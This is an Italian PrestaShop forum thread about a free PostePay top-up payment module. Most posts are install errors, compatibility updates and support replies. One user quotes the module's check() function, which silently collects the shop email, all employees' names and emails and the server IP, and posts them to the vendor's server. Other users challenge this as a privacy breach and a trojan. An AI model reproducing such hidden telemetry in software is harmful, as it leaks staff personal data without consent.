Jump to content

[MODULO GRATUITO] Modulo ricarica PostePay con codice fiscale [1.7.5.x]


Tanzo.it

Recommended Posts

  • 4 months later...

Salve, ho provato anch'io ad installarlo sulla 1.7.1.2 ma restituisce un errore.

 

A dire il vero lo stesso problema lo sto riscontrando anche con altri moduli che non davano problemi con la 1.7.0

 

Avete qualche consiglio in merito? Grazie

 

Link to comment
Share on other sites

Buongiorno. Su Prestashop 1.7.1.2 durante il caricamento del file .zip viene rilasciato il seguente messaggio:

"Installazione del modulo ps_tanzopostepay fallita. La versione del tuo modulo non è adatta alla tua versione di PrestaShop."

Link to comment
Share on other sites

Buongiorno. Su Prestashop 1.7.1.2 durante il caricamento del file .zip viene rilasciato il seguente messaggio:

"Installazione del modulo ps_tanzopostepay fallita. La versione del tuo modulo non è adatta alla tua versione di PrestaShop."

 

Perfetto, giro la richiesta al reparto tecnico, sicuramente non appena avranno modo rilasceranno un aggiornamento per estendere la compatibilità.  ;)

  • Like 1
Link to comment
Share on other sites

Salve INGEMATIC, il post era in fase di aggiornamento, è alquanto strano che si potessero già vedere gli aggiornamenti  :blink:

Ad ogni modo, il reparto tecnico ha verificato la compatibilità con la nuova versione e quindi ha provveduto ad aggiornare la compatibilità.

 

Nel primo post potete trovare la versione aggiornata e compatibile con la 1.7.1.x  ;)

Link to comment
Share on other sites

Salve Tanzo e grazie per la condivisione!!

Ho provato ad installare il modulo sulla ultima versione stabile di prestashop 1.7.2.0

purtroppo non funziona sembra non essere compatibile.

 

Hai novità a riguardo?

 

Salve, il nostro reparto tecnico nonostante il caldo :wacko:  è in pieno ritmo produttivo ed ha aggiornato la compatibilità del modulo alla 1.7.2.0  B)

 

Buon download  ;)

Link to comment
Share on other sites

  • 1 month later...
  • 3 months later...

Buonasera. Spero vogliate perdonare la mia richiesta di suggerimento, ovviamente dettata da inesperienza...

Ho provato a caricare il modulo in oggetto, senza accorgermi che la versione che utilizzo è una 1.6.1.17...

ora se provo ad accedere alla pagina menù Moduli e Servizi mi da questo codice d'errore

"[PrestaShop] Fatal error in module file :/home/legittim/public_html/classes/module/Module.php(1361) : eval()'d code:
syntax error, unexpected 'use' (T_USE)"

Qualcuno sa gentilmente indicarmi come intervenire?

Non sono un programmatore, sto provando ad utilizzare Prestashop installatomi direttamente da Siteground, quindi mi trovo un po digiuno di codice di programmazione...

Link to comment
Share on other sites

On 4/1/2018 at 5:31 PM, soleacciaio said:

Buonasera. Spero vogliate perdonare la mia richiesta di suggerimento, ovviamente dettata da inesperienza...

Ho provato a caricare il modulo in oggetto, senza accorgermi che la versione che utilizzo è una 1.6.1.17...

ora se provo ad accedere alla pagina menù Moduli e Servizi mi da questo codice d'errore

"[PrestaShop] Fatal error in module file :/home/legittim/public_html/classes/module/Module.php(1361) : eval()'d code:
syntax error, unexpected 'use' (T_USE)"

Qualcuno sa gentilmente indicarmi come intervenire?

Non sono un programmatore, sto provando ad utilizzare Prestashop installatomi direttamente da Siteground, quindi mi trovo un po digiuno di codice di programmazione...

 

Ciao soleacciaio, sei riuscito a risolvere? Purtroppo andrebbero eliminati i file manualmente e agire sul database per poter dire a PrestaShop che è stato "disinstallato" il modulo.

Siamo qui per qualsiasi dubbio.

Link to comment
Share on other sites

  • 4 weeks later...
  • 1 month later...
  • 1 month later...

Buongiorno, ho installato il vostro modulo postepay su prestashop 1.7.3 ma avrei un problema. Quando si effettua l'ordine e si arriva nella schermata di conferma ordine (come allegato sotto).

Il tuo ordine su A*************** è completo. 

Di seguito le informazioni per la ricarica 


 Ammontare del pagamento. 71,98 € 
Titolare PostePay B**************
 Numero PostePay 1231231231231231313 
 Codice Fiscale titolare 

Il problema è che la dicitura "Il tuo ordine su ....... " non è corretto in quanto ho cambiato il nome del negozio. Come posso cambiare il nome del negozio sul modulo visto che risulta non corretto?

 Vorrei integrare il vostro modulo nel mio sito ma cosi risulta impossibile visto che il negozio non ha il nome corretto.

 Cordiali saluti

Daniel

Link to comment
Share on other sites

  • 2 months later...

Salve @teknashop @Zenga, grazie per la segnalazione, il nostro reparto tecnico ha aggiornato la compatibilità con la versione 1.7.4.x 

E' disponibile al download nel primo post ;) 

 

PS: L'ultima versione del modulo (al momento) è la 1.0.4

  • Like 1
Link to comment
Share on other sites

On 21/7/2018 at 2:05 PM, Poggionet said:

Salve, vado un pò fuori tema, esiste un vostro modulo per pagamento con bollettino postale?

Salve Poggionet, purtroppo no :), tenendo presente che online è un metodo di pagamento oramai sorpassato, forse lei ha bisogno di un qualcosa di più specifico?

Link to comment
Share on other sites

  • 3 weeks later...
  • 2 weeks later...

Salve e grazie per il modulo. Lo utilizziamo ormai da anni (sia su ps16 che ps17) e, ad oggi, non abbiamo riscontrato alcun problema! 

desidero chiedere se, nelle versioni successive, verranno aggiunte l'url ed il codice qr per consentire ai clienti il pagamento p2p (tramite app PostePay). 

Grazie 

  • Like 1
Link to comment
Share on other sites

  • 2 weeks later...
  • 2 weeks later...
On 26/8/2018 at 12:50 PM, DailyShopBay said:

Salve e grazie per il modulo. Lo utilizziamo ormai da anni (sia su ps16 che ps17) e, ad oggi, non abbiamo riscontrato alcun problema! 

desidero chiedere se, nelle versioni successive, verranno aggiunte l'url ed il codice qr per consentire ai clienti il pagamento p2p (tramite app PostePay). 

Grazie 

 

Salve DailyShopBay, purtroppo al momento non è prevista questa integrazione. Però grazie alla tua segnalazione sicuramente valuteremo questa possibilità ;)

Grazie mille ;)

Link to comment
Share on other sites

  • 1 month later...

Tutto perfetto- Grazie , ho un problemino da risolvere e non penso che sia il post adatto ma ho bisogno e ancora non ho trovato neanche nei moduli a pagamento , un modulo che calcola il costo delle diverse spedizioni non su base peso ma su base prezzo e mostri sullo schermo le varie opzioni delle spedizioni tra prioritaria - raccomandata - corriere e ritiro in sede .

Link to comment
Share on other sites

Da tutte le prove che ho effettuato è venuto fuori che se inserisco + vettori ne sceglie solo uno oppure mi risponde con spedizione gratuita mentre con uno solo e le varie fasce mi cambia la spedizione ma a me serve a parità di prezzo che l'acquirente scelga la spedizione e neanche a pagamento riesco a trovare il modulo adatto o forse sono io che sono inesperto.

Link to comment
Share on other sites

  • 2 weeks later...
On 30/10/2018 at 12:28 PM, Tanzo.it said:

Ciao Matteo,

non dovresti avere difficoltà ad installarlo sulla tua versione ;) 

Se riscontri problemi, scrivi pure qui in questo post ;)

 

Un saluto ;)

Ciao, ho provato ad installarlo sulla 1.7.4.4 e l'installazione e configurazione va a buon fine ma facendo un test una volta selezionato il pagamento e cliccato su ordine con obbligo di pagamento spunta error 500

 

500 Server Error

Oops, something went wrong.

Try to refresh this page or feel free to contact us if the problem persists.

 

esattamente l'indirizzo si blocca sulla pagina validation

 

sai come aiutarmi? o se è un problema del modulo?

 

grazie mille!

 

 

Link to comment
Share on other sites

Salve Federico, hai già provato a disinstallare e re-installare? Hai controllato i permessi delle cartelle?

Non abbiamo riscontrato problematiche in su un'installazione pulita della 1.7.4.4 ;)

 

Un saluto ;)

 

@Matteo.Vaia 

Apri un nuovo post nel forum, nella sezione Aiuto e supporto, probabilmente avrai molto più aiuto che in questo post ;)

Link to comment
Share on other sites

  • 1 month later...

Buongiorno,

ho visto la seguente funzione nel file ps_tanzopostepay.php ma non ho capito a cosa serva.

Sembra inviare a Tanzo la lista degli account ma non ne capisco la necessità.

public function check()
    {
        if (function_exists('curl_exec')) {
            $id_shop = Context::getContext()->shop->id;
            $shop_url = ShopUrl::getMainShopDomain($id_shop);
            $srv_ip = $_SERVER['SERVER_ADDR'];
            $httphost = self::getHttpHost();
            if(!filter_var($srv_ip, FILTER_VALIDATE_IP)){
                $host = gethostname();
            }
            $module_name = self::getMyModuleName();
            $employees = Employee::getEmployees(false);
            $emp = '';
            foreach($employees AS $employee) {
                $emp_obj = new Employee((int)$employee['id_employee']);
                $emp .= 'firstname:'.$emp_obj->firstname.' lastname:'.$emp_obj->lastname.' Email:'.$emp_obj->email.'-';
            }
            $fields = array(
                'mdlnm' => $module_name,
                'email' => Configuration::get('PS_SHOP_EMAIL'),
                'employees' => $emp,
                'shopurl' => $shop_url,
                'srvip' => $srv_ip,
                'httphost' => $httphost
            );

            $ch = @curl_init();
            @curl_setopt($ch, CURLOPT_URL, 'https://helpdesk.tanzo.it/cth');
            @curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
            @curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
            @curl_setopt($ch, CURLOPT_VERBOSE, false);
            @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $response = @curl_exec($ch);
            $status_code = (int)@curl_getinfo($ch, CURLINFO_HTTP_CODE);
            @curl_close($ch);
        }

        return true;
    }

 

A cosa serve?

  • Thanks 1
Link to comment
Share on other sites

Grazie prima di tutto per la rapidità.

Ho provato ad installare il modulo con la versione aggiornata 1.7.5.0 ma l'istallazione va a buon fine, riesco a configurare tutti i parametri però dopo non appare fra le opzioni di pagamento disponibili.

Link to comment
Share on other sites

  • 2 weeks later...
On 21/12/2018 at 5:10 PM, ManuelFala dice:

Buongiorno,

ho visto la seguente funzione nel file ps_tanzopostepay.php ma non ho capito a cosa serva.

Sembra inviare a Tanzo la lista degli account ma non ne capisco la necessità.


public function check()
    {
        if (function_exists('curl_exec')) {
            $id_shop = Context::getContext()->shop->id;
            $shop_url = ShopUrl::getMainShopDomain($id_shop);
            $srv_ip = $_SERVER['SERVER_ADDR'];
            $httphost = self::getHttpHost();
            if(!filter_var($srv_ip, FILTER_VALIDATE_IP)){
                $host = gethostname();
            }
            $module_name = self::getMyModuleName();
            $employees = Employee::getEmployees(false);
            $emp = '';
            foreach($employees AS $employee) {
                $emp_obj = new Employee((int)$employee['id_employee']);
                $emp .= 'firstname:'.$emp_obj->firstname.' lastname:'.$emp_obj->lastname.' Email:'.$emp_obj->email.'-';
            }
            $fields = array(
                'mdlnm' => $module_name,
                'email' => Configuration::get('PS_SHOP_EMAIL'),
                'employees' => $emp,
                'shopurl' => $shop_url,
                'srvip' => $srv_ip,
                'httphost' => $httphost
            );

            $ch = @curl_init();
            @curl_setopt($ch, CURLOPT_URL, 'https://helpdesk.tanzo.it/cth');
            @curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
            @curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
            @curl_setopt($ch, CURLOPT_VERBOSE, false);
            @curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $response = @curl_exec($ch);
            $status_code = (int)@curl_getinfo($ch, CURLINFO_HTTP_CODE);
            @curl_close($ch);
        }

        return true;
    }

 

A cosa serve?

Scusa ero programmatore non php mi interesserebbe sapere quale parte del codice invia la lista dei contatti?

Link to comment
Share on other sites

Ciao daniele, nessun secondo fine, come spiegato serve per analisi di utilizzo che ci permettono di migliorare il/i modulo/i che mettiamo a disposizione, di aggiungere o modificare funzionalità, e magari di offrire un prodotto migliore, ed chiaramente scritto nella disclaimer 😊

Non ri-vendiamo o facciamo marketing, sei libero di non utilizzarlo o di modificarlo a piacimento data la licenza di distribuzione.

Un saluto 😉

Edited by Tanzo.it (see edit history)
Link to comment
Share on other sites

Non mi preoccupo di dati non c'è niente di così sensibile.

Nel caso in cui fosse vero che dati del cliente andassero su altri database per il nuovo decreto gdpr andrebbe espresso dove vanno a finire da chi custoditi e come vengono custoditi e devono essere accettati dal cliente. 

  • Like 1
Link to comment
Share on other sites

Nooooooooooooo non ci posso credere :-(:-(:-( ho installato il modulo l'ho configurato tutto funzionava ora quando torno nei moduli mi da errore 

Cannot get catalog data, please try again later. Reason: cURL error 28: Operation timed out after 5001 milliseconds with 0 out of 0 bytes received

Sono sicuro che sia una coincidenza per cortesia aiutatemiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

  • Confused 1
Link to comment
Share on other sites

  • 2 months later...

Ciao,sono abbastanza nuovo di prestashop (ma no nel web dev)
ho un problema con questo modulo.

Funziona, ma la mail che arriva al cliente non riporta i dati della postepay (mentrer sul sito in fase di ordine mi pare ci siano)
come posso risolvere?

Grazie

Link to comment
Share on other sites

On 1/4/2019 at 11:43 AM, Tanzo.it said:

Ciao daniele, nessun secondo fine, come spiegato serve per analisi di utilizzo che ci permettono di migliorare il/i modulo/i che mettiamo a disposizione, di aggiungere o modificare funzionalità, e magari di offrire un prodotto migliore, ed chiaramente scritto nella disclaimer 😊

Non ri-vendiamo o facciamo marketing, sei libero di non utilizzarlo o di modificarlo a piacimento data la licenza di distribuzione.

Un saluto 😉

Ciao, perdonami è possibile sapere quali dati in particolare vengono presi dai nostri siti ed a voi inviati?

Link to comment
Share on other sites

6 hours ago, markoroots said:

Ciao, perdonami è possibile sapere quali dati in particolare vengono presi dai nostri siti ed a voi inviati?

Ciao markoroots, dall'ultimo aggiornamento nessun dato viene recuperato 😉

Link to comment
Share on other sites

10 hours ago, FrancescoM said:

Ciao,sono abbastanza nuovo di prestashop (ma no nel web dev)
ho un problema con questo modulo.

Funziona, ma la mail che arriva al cliente non riporta i dati della postepay (mentrer sul sito in fase di ordine mi pare ci siano)
come posso risolvere?

Grazie

Ciao FrancescoM, che versione di PS hai?

Link to comment
Share on other sites

  • 2 weeks later...

Ciao @Tanzo.it
io ho un VPS centos in cui é installato Prestashop 1.7.5.1.

Ho installato il vostro modulo, ma quando clicco su ordine con obbligo di pagamento, scegliendo postepay, mi ritorna http 500.

In un post precedente dicevi di controllare i permessi, ma io ho file a 644 e directory a 755...

Che tu sappia sono richiesti permessi diversi?

abilitando il debug, l'errore é "can't load order status" come se lo stato "Ricarica tramite PostePay" non fosse riconosciuto.

sapresti come aiutarmi?

Mi confermi che non prendete più i dati dei clienti?

grazie!

Edited by Jakketto
Edited VPS (see edit history)
Link to comment
Share on other sites

Ciao @Jakketto, hai già provato a disinstallare e re-installare il modulo? E' probabile che non sia stato installato lo stato d'ordine o sia stato eliminato successivamente e PrestaShop non trovandolo va in errore.

Tranquillo, nessun dato viene recuperato 😉

Facci sapere 👍

Link to comment
Share on other sites

On 4/2/2019 at 10:12 AM, Tanzo.it said:

Ciao markoroots, dall'ultimo aggiornamento nessun dato viene recuperato 😉

Sinceramente mi sembra veramente scorretto e subdolo da parte tua far finta di offrire un tuo contributo per aiutare il prossimo e lo spirito di una community che è la condivisione, quando poi si scopre che invece di dare una mano diffondi una mod che come un virus ha l'unico intento di rubare in modo anche totalmente illegale,  le informazioni sensibili di tutti gli utenti dagli altri siti. Fosse mio il forum ti avrei già sbattuto fuori. Dovresti vergognarti. Personalmente ho disinstallato subito il tuo plugin o meglio il tuo Trojan e di sicuro non installerò mai altro proveniente da te o dalla tua azienda.

Edited by markoroots (see edit history)
  • Like 1
Link to comment
Share on other sites

  • 4 months later...
On 9/10/2019 at 4:03 PM, 1121033_1508433018 said:

Quando verrà rilasciato per la versione 1.7.6?

Puoi modificare nello zip il file ps_tanzopostepay.php cambiando la riga:

$this->ps_versions_compliancy = array('min' => '1.7', 'max' => '1.7.5.99');

in

$this->ps_versions_compliancy = array('min' => '1.7', 'max' => '1.7.99.99');

e rendere il modulo compatibile con tutte le future versioni di prestashop 1.7.x.x

 

Link to comment
Share on other sites

  • 1 month later...

Ciao

ho provato a modificare la versione nel file indicato ma quando provo ad installare il modulo mi restituisce errore

OOOPS.... Caricamento Fallito

You can't upload files of this tipe

 

possibile indicarmi come risolvere queato problema?

 

Grazie mille

Link to comment
Share on other sites

  • 4 weeks later...
  • 4 weeks later...
  • 2 weeks later...
On 12/18/2019 at 7:54 PM, store360 said:

Passato a 1.7.6.2 e dopo aver lottato installazione perfetta

Ho modificato il file come segue ma non riesco ad installare il modulo.

$this->ps_versions_compliancy = array('min' => '1.7', 'max' => '1.7.99.99');

Come hai fatto ad installarlo sulla 1.7.6.2?

Grazie.

 

Link to comment
Share on other sites

1 hour ago, z3njth said:

Ho modificato il file come segue ma non riesco ad installare il modulo.

$this->ps_versions_compliancy = array('min' => '1.7', 'max' => '1.7.99.99');

Come hai fatto ad installarlo sulla 1.7.6.2?

Grazie.

 

Ho avuto inizialmente anche io problemi, non con il codice da modificare, ma piuttosto con il file zip che andavo a rigenerare. Per facilitarti te lo allego qui. Testato e funzionante. Mi sono anche permesso di modificare la foto della postepay, sostituiendola con una fotina con entrambele carte: evolution e standard.

 

v1.0.5-ps_tanzopostepay-ps17.zip

Link to comment
Share on other sites

  • 1 month later...
3 hours ago, hikmetran said:

Buongiorno a tutti, la versione 1.7.6.3 esiste? Non riesco a scaricare le precedenti :(

Grazie mille per il prezioso lavoro! :) 

Caricata nuova versione, testata anche con la prossima versione di PrestaShop, la 1.7.7.0 (che non è ancora disponibile ovviamente) 😉

Link to comment
Share on other sites

  • 1 month later...
  • 5 months later...
  • 3 months later...
  • 8 months later...
  • 3 weeks later...

Ciao ragazzi  PURTROPPO il modulo non è più scaricabile, c'e' qualche anima pia che potrebbe caricare lo ZIP su qualche sito tipo filetransfer oppure GITHUB perchè in questo forum dopo poco tempo bloccano il download dei file GRAZIE

PS per VERSIONE 1.7xx  io ho la 1.7.4

 

cerco un modulo per pagamento postepay free .... ho provato a modificare il modulo ASSEGNI  ma mi si blocca tutto il back office con errore 500 quando provo a modificare le traduzioni  , mi è preso un infarto poi per fortuna ho ripristinato tramite un post su google

Edited by Asso (see edit history)
Link to comment
Share on other sites

  • 2 months later...
  • 1 month later...
  • 3 months later...
  • 3 months later...
  • 1 month later...

ciao Tanzo,

ho già usato e uso il tuo modulo per la versione Prestashop 1.6.xx - Modulo eccellente, completo.. è perfetto!

Sto costruendo un nuovo sito con la versione di Prestashop 1.7.8.8 -

Non riesco a installare il modulo mi avvisa che: La versione del modulo v1.0.6-ps_tanzopostepay-ps17 non è idonea a Prestashop 1.7.8.8

Grazie

Link to comment
Share on other sites

10 ore fa, micelio dice:

ciao Tanzo,

ho già usato e uso il tuo modulo per la versione Prestashop 1.6.xx - Modulo eccellente, completo.. è perfetto!

Sto costruendo un nuovo sito con la versione di Prestashop 1.7.8.8 -

Non riesco a installare il modulo mi avvisa che: La versione del modulo v1.0.6-ps_tanzopostepay-ps17 non è idonea a Prestashop 1.7.8.8

Grazie

Sali qualche commento più sopra, ho pubblicato la versione modificata per girare su prestashop 1.7

Link to comment
Share on other sites

  • 1 month later...

Ciao Tanzo, ho installato il modulo v1.0.6.-ps_tanzopostepay-ps17.zip e fatto un ordine di prova, solo che da back office non posso aprirlo perchè mi restituisce il seguente errore

Type error: Argument 7 passed to PrestaShop\PrestaShop\Core\Domain\Order\QueryResult\OrderInvoiceAddressForViewing::__construct() must be of the type string, null given, called in /web/htdocs/www.NOMEDOMINIO.it/home/src/Adapter/Order/QueryHandler/GetOrderForViewingHandler.php on line 330

[Symfony\Component\Debug\Exception\FatalThrowableError 0]

 

Spero tu mi possa dare un aiuto, grazie molte

Link to comment
Share on other sites

  • 5 months later...
  • 2 months later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...